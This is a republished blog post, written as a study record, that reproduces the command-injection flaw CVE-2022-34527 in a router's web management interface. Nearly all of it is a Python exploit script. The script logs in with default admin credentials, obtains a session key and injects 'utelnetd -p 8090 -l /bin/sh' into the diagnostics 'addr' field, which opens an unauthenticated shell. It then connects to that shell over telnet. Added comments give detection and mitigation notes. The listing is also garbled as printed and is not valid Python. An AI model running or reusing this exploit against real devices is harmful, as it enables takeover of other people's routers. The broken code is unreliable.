命令注入漏洞CVE-2022-34527复现(学习记录)

import requests

import urllib

import os

from time import sleep

from urllib.parse import unquote

 

# NOTE(review): as printed on this page the listing is not valid Python
# (literals appear lower-cased and operators dropped, presumably by page
# extraction). Read it as an illustration of the request sequence.

# Lab target: a private (RFC 1918) address. `server` is reused at the end of
# the script as the host argument of the telnet client call.
server = "192.168.1.1"

# Base URL of the device's web management interface: plain HTTP on port 80,
# so everything sent below (including the login credentials) is unencrypted.
main_url = "http://192.168.1.1:80"

# Fixed browser-like User-Agent sent with every request in this script.
headers = {

        "user-agent": "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/98.0.4758.82 safari/537.36",

        }

 

 

# Sends the login request to /cgi-bin/login.asp and prints the response body.
#
# Security-relevant points visible in this block:
#  - The credentials are user=admin / pwd=admin. A device that still accepts
#    them leaves the authenticated request in exp() reachable; changing
#    default credentials removes that precondition.
#  - The credentials travel in a GET query string over http://, so they end
#    up in proxy and web-server logs as well as on the wire.
#  - Nothing is returned and the response is not checked, so callers cannot
#    tell whether the login succeeded.
def login():

    # A new session is created in every function of this script, so cookies
    # set by this response are not carried into the later requests.
    # NOTE(review): presumably the device tracks login state some other way
    # (not by cookie); the page does not show this, so confirm.
    s = requests.session()

    # Concerns TLS certificate checking; main_url is http://, so it has no
    # effect here.
    s.verify = false

    # The trailing `_=` value looks like a cache-busting timestamp (assumption).
    url = main_url "/cgi-bin/login.asp?user=admin&pwd=admin&_=1690122728925"

    resp = s.get(url,headers=headers,timeout=10)

    print(resp.text)

 

 

# Requests /cgi-bin/get/new_gui/get_sessionkey.asp and returns the response
# body unmodified as the session key. The value is also echoed to stdout.
# No status code or format check is done, so an error page would be returned
# as if it were a key.
def get_session_key():

    # Fresh session: nothing from login() is reused in this request.
    s = requests.session()

    # Concerns TLS certificate checking; no effect with the http:// main_url.
    s.verify = false

    url = main_url "/cgi-bin/get/new_gui/get_sessionkey.asp"

    resp = s.get(url,headers=headers,timeout=10)

    # Raw body, taken as-is (no stripping or parsing).
    sessionkey = resp.text

    print(sessionkey)

    return sessionkey

 

 

# Posts the form fields type / sessionkey / addr to
# /cgi-bin/new_gui/set/diagnostics.asp and prints the response body.
#
# Judging by its name, `addr` is meant to hold the host/address for a
# diagnostic (assumption; the handler is not shown on this page). Here it
# carries a command string instead; a device that acts on it is exhibiting
# the command-injection flaw the page attributes to CVE-2022-34527.
#
# What a defender can take from this block:
#  - Detection: POSTs to this path whose `addr` value is not a plain
#    hostname or IP address; afterwards an unexpected utelnetd process or a
#    new listener on TCP 8090 on the device.
#  - Mitigation: follow the vendor's guidance for this CVE where available,
#    keep the management interface off untrusted networks, and on the
#    server side validate `addr` against a strict address pattern rather
#    than handing it to a shell.
def exp(sessionkey=none):

 

    # The value placed in `addr`: it asks for a telnet daemon bound to
    # /bin/sh on port 8090.
    cmd = " utelnetd -p 8090 -l /bin/sh "

     

    s = requests.session()

    # Concerns TLS certificate checking; no effect with the http:// main_url.
    s.verify = false

    # unquote() percent-decodes its argument; `cmd` contains no percent
    # escapes, so that call leaves it unchanged. The key is decoded the same
    # way before being sent back.
    params = {"type":"p", "sessionkey":urllib.parse.unquote(sessionkey),"addr":urllib.parse.unquote(cmd)}

    url = main_url "/cgi-bin/new_gui/set/diagnostics.asp"

    # timeout=100000 seconds is effectively "wait indefinitely" for the reply.
    resp = s.post(url,data=params,headers=headers,timeout=100000)

    print(resp.text)

 

 

# Script driver: login, fetch the session key, send the diagnostics request,
# wait three seconds, then start the system telnet client against port 8090.
# The status lines are printed unconditionally; no step checks an HTTP status
# or response body, so a printed message does not confirm that step worked.
if __name__ == '__main__':

    print("\n[*] connection ",main_url);

    login()

 

    print("[*] getting session key")

    sessionkey = get_session_key()

 

    print("[*] sending payload")

    exp(sessionkey=sessionkey)

    print("[*] running telnetd service")

    print("[*] opening telnet connection\n")

    # Fixed delay before connecting; nothing verifies that port 8090 is open.
    sleep(3)

    # os.system() runs a shell command line built by string concatenation.
    # `server` is a constant in this file; if it ever came from input, an
    # argument list passed to subprocess.run() would avoid shell parsing.
    os.system('telnet ' str(server) ' 8090')

原文链接:https://bbs.kanxue.com/thread-278127.htm

网络摘文,本文作者:15h,如若转载,请注明出处:https://www.15cov.cn/2023/08/27/命令注入漏洞cve-2022-34527复现(学习记录)/
